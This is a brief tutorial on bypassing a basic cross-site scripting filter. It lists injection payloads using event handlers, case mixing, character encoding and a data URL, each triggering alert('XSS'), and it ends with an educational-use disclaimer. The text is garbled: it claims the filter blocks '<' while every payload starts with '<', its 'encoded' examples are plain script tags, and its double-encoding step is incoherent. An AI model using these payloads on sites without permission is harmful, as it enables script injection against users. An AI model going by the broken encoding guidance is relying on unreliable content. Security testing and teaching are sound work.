Bypass Simple XSS Filter (<)

TL;DR

This guide shows how to bypass a basic XSS filter that only blocks the less-than symbol (<). We’ll use alternative HTML tags, encoding tricks, and case mixing to get JavaScript code executed.

Bypassing the Filter

1. Understanding the Problem: The filter is likely looking for <script>, <img src="…"> etc. It’s a very basic defence and easily bypassed.
2. Alternative Tags: Try using other HTML tags that can execute JavaScript. Some examples include:
   • <body onload=alert('XSS')> – Executes when the page loads.
   • <svg onload=alert('XSS')> – Similar to body, but using an SVG element.
   • <input type="image" src="x" onerror=alert('XSS')> – Executes when the image fails to load.
3. Case Mixing: Filters often aren’t case-sensitive. Try mixing upper and lower case letters:
   • <ScRiPt>alert('XSS')</sCrIpT>
4. Encoding: HTML encoding can sometimes bypass filters. Try using character entities.
   • Decimal Encoding: <script>alert('XSS')</script>
   • Hexadecimal Encoding: <script>alert('XSS')</script>
5. Attribute-Based XSS: If the filter allows attributes, you can inject JavaScript into event handlers.
   • <img src="x" onerror=alert('XSS')> – The onerror attribute executes when the image fails to load.
   • <body onmouseover=alert('XSS')> – Executes when the mouse hovers over the body element.
6. Using Data URLs: Sometimes, data URLs can help bypass filters.
   • <img src="data:image/svg+xml;<svg onload=alert('XSS')>">
7. Double Encoding (Less Common): In some cases, double encoding might work if the application decodes the input multiple times.
   • Encode < to < then encode that again to &#60;. This is less likely to succeed but worth a try.
8. Testing: After each attempt, check if the JavaScript code executes in your browser.
   • Use your browser’s developer tools (usually F12) to inspect the HTML source and see if the injected code is present.
   • Look for JavaScript errors in the console that might indicate successful execution.

Important Note: This information is provided for educational purposes only. Do not use these techniques to attack websites without permission. XSS attacks are illegal and harmful.